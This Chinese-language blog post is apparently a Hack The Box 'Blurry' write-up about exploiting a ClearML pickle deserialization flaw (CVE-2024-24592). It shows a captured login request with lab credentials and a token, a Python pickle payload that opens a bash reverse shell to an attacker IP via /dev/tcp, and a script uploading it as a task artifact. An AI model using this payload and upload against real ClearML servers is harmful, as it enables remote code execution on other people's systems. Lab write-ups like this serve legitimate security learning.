【season-5】box Blurry 一个失败的user记录

Uncategorized
4.5k words

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

没有公开CVE-2024-24592的利用方式

这里我用文章中原本的upload方式只能把plk传到我的目录下,我看其他的好像也有每个五分钟就跑的,所以我这里抓个包看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
GET /auth.login HTTP/1.1
Host: api.blurry.htb
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-ClearML-Worker: flower
X-Trains-Worker: flower
X-ClearML-Client: clearml-1.16.1
X-Trains-Client: clearml-1.16.1
Authorization: Basic TkJEMjFLNkdHRFdLN09RUjdWWVI6bDZQUnRZU21naE81VzI4cWNIcmxUZk52RXBnZFpoeURaaW82NzlYNG9mc3ZFeElpdTA=

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 09 Jun 2024 09:20:26 GMT
Content-Type: application/json
Content-Length: 561
Connection: keep-alive
Set-Cookie: clearml_token_basic=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M; Expires=Sat, 24 Apr 5193 19:07:05 GMT; Max-Age=99999999999; HttpOnly; Path=/
Vary: Accept-Encoding
Content-Encoding: gzip

{"meta":{"id":"3295e0caffee469a84f4328a43d4aa8d","trx":"3295e0caffee469a84f4328a43d4aa8d","endpoint":{"name":"auth.login","requested_version":"2.27","actual_version":"1.0"},"result_code":200,"result_subcode":0,"result_msg":"OK","error_stack":"","error_data":{}},"data":{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M"}}

这里他返回的token就可以拿来直接用了,请求时候的内容是base64的这俩他web给的认证值

1
2
os.environ['CLEARML_API_ACCESS_KEY'] = 'NBD21K6GGDWK7OQR7VYR'
os.environ['CLEARML_API_SECRET_KEY'] = 'l6PRtYSmghO5W28qcHrlTfNvEpgdZhyDZio679X4ofsvExIiu0'
1
2
└─$ echo 'TkJEMjFLNkdHRFdLN09RUjdWWVI6bDZQUnRZU21naE81VzI4cWNIcmxUZk52RXBnZFpoeURaaW82NzlYNG9mc3ZFeElpdTA='|base64 -d
NBD21K6GGDWK7OQR7VYR:l6PRtYSmghO5W28qcHrlTfNvEpgdZhyDZio679X4ofsvExIiu0

不过抓包抓到了直接拿来用就行..我不挑食

然后我的脚本写好了

先是反序列化一个

1
2
3
4
5
6
7
8
9
10
11
import pickle
import os

class RunCommand:
    def __reduce__(self):
        return (os.system,('/bin/bash -i >& /dev/tcp/10.10.16.xx/xxx 0>&1',))

command = RunCommand()

with open("revshell.pkl",'wb') as f:
    pickle.dump(command,f) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import base64
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder


url = 'http://files.blurry.htb/'

multipart_data = MultipartEncoder(
    fields={
        '/Black Swan/Review JSON Artifacts.e49866199ce645538b859bf17b086c39/artifacts/pickle_artifact/pickle_artifact.pkl': (
            'pickle_artifact.pkl',
            open('./revshell','rb').read(),#这里是我的
            'binary/octet-stream'
        )
    }
)

headers = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjA1MTY4MjYsImlkZW50aXR5Ijp7InJvbGUiOiJ1c2VyIiwidXNlciI6IjRkNWYxMWY5NDBlZTRlMmE4NDFlMTY1OGQ5NzAxYWQ5IiwiY29tcGFueV9uYW1lIjoiY2xlYXJtbCIsImNvbXBhbnkiOiJkMWJkOTJhM2IwMzk0MDBjYmFmYzYwYTdhNWIxZTUyYiIsInVzZXJfbmFtZSI6InRlc3QifSwiZW52IjoiPHVua25vd24-IiwiaWF0IjoxNzE3OTI0ODI2LCJhdXRoX3R5cGUiOiJCZWFyZXIiLCJhcGlfdmVyc2lvbiI6IjIuMjciLCJzZXJ2ZXJfdmVyc2lvbiI6IjEuMTMuMSIsInNlcnZlcl9idWlsZCI6IjQyNiIsImZlYXR1cmVfc2V0IjoiYmFzaWMifQ.HTLTGznaGeTwLHRIr6m0mDsr17Leem3-iFrGitdln5M',
    'Content-Type': multipart_data.content_type
}
requests.post(url, headers=headers, data=multipart_data)
re =  requests.post(url, headers=headers, data=multipart_data, proxies={"http":"127.0.0.1:8080"})

print(re.text)